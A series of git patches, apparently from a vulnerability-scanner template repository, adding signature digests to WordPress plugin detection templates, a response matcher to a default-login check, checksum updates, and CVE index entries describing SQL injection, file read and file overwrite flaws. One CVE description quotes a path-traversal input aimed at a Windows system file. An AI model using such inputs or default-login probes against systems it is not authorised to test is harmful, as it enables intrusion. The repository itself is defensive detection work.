@@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088ef7b51bad8db12eaf31b92168f57a5bbcc008cd63588604f1d412faea2e024022100f792c2d94bb5c7da9b6206643284dbdf5b195e7ab4ee27cea6561f3772cb2af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..827d8324f6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8888271c560d4b9b1fb5ea5accd143ccd2e31884d30877ce1e7b812fd8b060b022100b53a15f950f78834458f1acfc228730bfeda9b26ac5a34c1dcdc92b422a99881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..dbec64f08d 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201ea8dfac92de7c018e358467e83d8639c70943c1527a70fc222060cbad3b8b8d0220750ac1dc8157b4747aad079c3a50aaf856323dd0928bfc844153cc68f895351f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..a0328536ee 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100948cb90abcb97cd4e20f4827dfcbf86f118746b243ba234157f28f85c1cbeb1b02200f5eb113fbee6d4af31be90f6e704678b97de83fe91e947c58b5832d6cf5a8e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..0f018d743f 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207223fb32bc0ecad4e4a06cfd45f4eceafaf28a6a75383254c8bea711b0a1bd83022009792015181b77eee1210f36ff1a4153f5d1157364a1165d929375512993c94c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..d4c7803419 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220324249c991f9e8a16f25594b922204d034fd07c6e821e52977cd9b68ee04e4d602210091bf910d4698debdc39bc4bda8a46c6779712754a81765b36ff6e040afe07732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..6213a1fd00 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e2485415597cdecf76ee2cc2c3c33f66ff5b44cdf30c68ea631f7300092d2630220245318bf18fd55de69aa877dd7641f85a72379a1df3e4859c264d618cb3a042e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..90dd67281b 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfe7aadddbffbbe9e0700d4a6747783d88cefc339cf630c32dbd49c336ca2db2022100a4ac9b8fe4dbf1b26a2823c7f9ff7290d7c371c036f667d81227e4d19a206ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..e5aaeb365a 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205927a3a12a4f763b5a50610310f691445818b5443e389de5754b8cbda0e533fc022100a21635b544e50f2b8d67eff9221ca93e2a37df7f065f59ba3b8157623b65960a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..9901772f49 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b201883a67c526bb5544765a4eeedd144a1a93f939ed39310e51c7dee6f133b0221009da08002fd82854e36cc9689f99b67a7d74c6e65f5cbc9bb047756421c0de7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..b8a394f8d7 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220206bbcdeef5b76e68695de877becf59ce6beea1307c43ca54bedb5b67f5d2942022033d72f0e58b871af22c9374518aa23d4b6fc74bf4295e4b174c33d344c76c93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..9d8a3b932f 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078d09f0df4421d3b436e94a1d25bc795dc9162fb19788131cdd22403dfc82d92022048ad5642870e1affb0d9e58a2d836583cfe2b761caeb7feb2f225382f8573b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..67e6db0a72 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7563f788ebfeeb04d4e280a4e994601503a4e515ca8c56b7617b2c2e459a06e022100adb05e82b84a6a7af04dd20c0721979dcd1eed632076cae9cdf4f3821232fde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..0754623111 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210094190aaad8422b7018511e40c372985d4dbb5cee781ac92a52c8bf27d45d8d750220216ce369c3efbaa2367eb9c8e7b63dae371c1a57135b7de945d555ba458c3bab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..3decefd7dc 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206684a38c1ceb4f27b7fbbfcd095d791429d1b8670a545538eb073f91d46ea63602201f7b93ffb654eb90f7a30076e410202adc15638768947ff3e88db67560d5a13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..161048e9c0 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100998bce1431fd5f0d5f34381df1eabc610ce2c2a58c62a87c329e639b11f6e05f02207f15244d49fc1660afc9d94c8ee718343b1e5fdf5b7731b61c9667729c514ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..47e2661e2c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008685362cd4e6ee565ba13655f4d08d618b4651f77cfd664732d8c3e721a5eb07022100e06b698afc9f49f22958badb534ede704e9550b7408c5561a3b554ad3e0a6a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..b8fe689c15 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c39bbb3e960aca16149174e914b1f1eaf39fce358bae9b815b87960f1ce4a65022021b91ac073556d863bf0bd57fd87a69234d9f4f3efb77c8aeb4406d06fb95757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..ef0cdb16c4 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d287567dc2ec19aadd0eb588815c18d098565a6ebfe7c500fb4f8ab1baac4fe02207995362627f1de93aeedde592cb07f2b245e92821f7ce4a5327d7caa645b2fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..c86fba2624 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fccfb5d630720b726d1728c360f263c85a21ec0212438ca339b42941373bca800220167a9f408b8e6f1fa4426b71e9f41196549ea2b91913c9f5b017f35c3eb0caa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..58c4d16afe 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220474d16b60d9d980dacf094e9f2ddd44c951104c39bef0ac0ca81f46182f97e8202205402e39e9e57c6a7e22c8930f71e483a2fe636adac2669734889ab3b145f109e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..302f09ba92 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204cd2513ebb6b535763018caf93fc8a03097434e9234aa712b287c91829c9479f022100c9c37828db494c658547dc54fc340d72cc4b6ad164c44ba6d9b4b0bc15362472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 717f3fed222dbf7545cf28bc27e857b0b0ac27c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 31 Jul 2024 15:18:43 +0530 Subject: [PATCH 1783/1841] Update cs141-default-login.yaml --- http/default-logins/abb/cs141-default-login.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index 4dacd946b2..92de98ea9f 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,13 @@ http: condition: and part: header + - type: word + part: body + words: + - 'accessToken' + - 'AdminFirstTime' + condition: and + - type: status status: - 200 From 5dc18c2c8ff0533033dba965cc56e689db442d64 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 31 Jul 2024 10:00:47 +0000 Subject: [PATCH 1784/1841] Auto Generated cves.json [Wed Jul 31 10:00:47 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 527989e48a..e212a59394 100644 --- a/cves.json +++ b/cves.json @@ -2490,6 +2490,7 @@ {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} {"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"} {"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"} +{"ID":"CVE-2024-39907","Info":{"Name":"1Panel SQL Injection - Authenticated","Severity":"critical","Description":"1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39907.yaml"} {"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"} {"ID":"CVE-2024-40348","Info":{"Name":"Bazarr \u003c 1.4.3 - Arbitrary File Read","Severity":"high","Description":"Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-40348.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} @@ -2515,6 +2516,7 @@ {"ID":"CVE-2024-6205","Info":{"Name":"PayPlus Payment Gateway \u003c 6.6.9 - SQL Injection","Severity":"critical","Description":"The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6205.yaml"} {"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"} {"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"} +{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"} {"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"} {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} {"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 95a4b89a39..699f66a1ce 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -379d7b02d8ae7e19dec76cc7cd470aea +b69b59d70bacb648d224873b1b83419e From 28641724a463c5a061c18f3c9bed09d864f834db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 31 Jul 2024 10:01:08 +0000 Subject: [PATCH 1785/1841] Auto Generated Templates Checksum [Wed Jul 31 10:01:08 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6d3175c9a5..96f9bab7e0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3507,6 +3507,7 @@ http/cves/2024/CVE-2024-38289.yaml:fc8b321f6b565cc6feea194cb9265ff81d325e09 http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 +http/cves/2024/CVE-2024-39907.yaml:cf74b191dfa13bc6ff13ee7a604008a728ed697c http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -3532,7 +3533,7 @@ http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6366.yaml:13d57831fba2fd50976e1e01e8048ff76767e4a9 -http/cves/2024/CVE-2024-6396.yaml:f6d4a643effb2e2a64d15f2c940ca4b7d15e1557 +http/cves/2024/CVE-2024-6396.yaml:2a439e4586a7a6349d9d10541ad8fd7ffbb1ad0d http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 @@ -7341,230 +7342,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:8316097b4f2c4ad748ce6b585a5a118a05aa8f67 +http/technologies/wordpress/plugins/add-to-any.yaml:ecd986a7f80f21c3146b823e20ba815097081fe1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:04d3f957cd11fd6f59b50d8d006ae645e6f41469 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:0d22c21a259e09a2d976671facc91aff67b64908 +http/technologies/wordpress/plugins/akismet.yaml:8ab3c1c3713da78df9505399e37cd61e8f87fb4b http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9f4faa8e62a7bd8e62e772a9bb5fb81d792f237f +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:b7bbbdc6b18dab259342e7ce0bc6b0d7199d8ee4 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:53e996974306507ea538a3c3022c94c0e12bdfb5 +http/technologies/wordpress/plugins/amp.yaml:860722a7f7f18b4c4f24ea4e813c4f4bab67817d +http/technologies/wordpress/plugins/antispam-bee.yaml:f97fba5c4768e71706cb96e8c446c8586c3d1781 +http/technologies/wordpress/plugins/astra-sites.yaml:b646d3ea341be9d4705da75684a52b75f16cd26b http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:7249d00247d23107454177596c97f03baab19938 +http/technologies/wordpress/plugins/backwpup.yaml:940e6656953dd0f22c9a01a6c3cbb5127028faa6 +http/technologies/wordpress/plugins/better-search-replace.yaml:e9f1c2d9a277ba0806a365dc2bb1315824fe3b20 +http/technologies/wordpress/plugins/better-wp-security.yaml:eec440f8c88e6e3a0c8d1a5d0cb4b77f7cd023e9 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:ce786996ca7edfdf766f37cefafcf0157825a97a +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:16498aa789c204a3b8995e81c4465d1aa498684a +http/technologies/wordpress/plugins/breeze.yaml:35e757aea8b524f5b90612efbfc1ab9717b4a090 +http/technologies/wordpress/plugins/broken-link-checker.yaml:2ba0b775150f199d1935b1d363643718fc8619f7 +http/technologies/wordpress/plugins/chaty.yaml:4a4b3b6075cd2a31db1863f5ea358e5da102c119 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:9148cf0c551841b97d2ade339448994474788562 +http/technologies/wordpress/plugins/classic-editor.yaml:bf033d3416148abb761cd0edc779c58587372113 +http/technologies/wordpress/plugins/classic-widgets.yaml:484f9f877009cc53d487946ba744e223991b7a67 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:86aefbaba8b6c23297f371cd79b3279ffb44411c http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 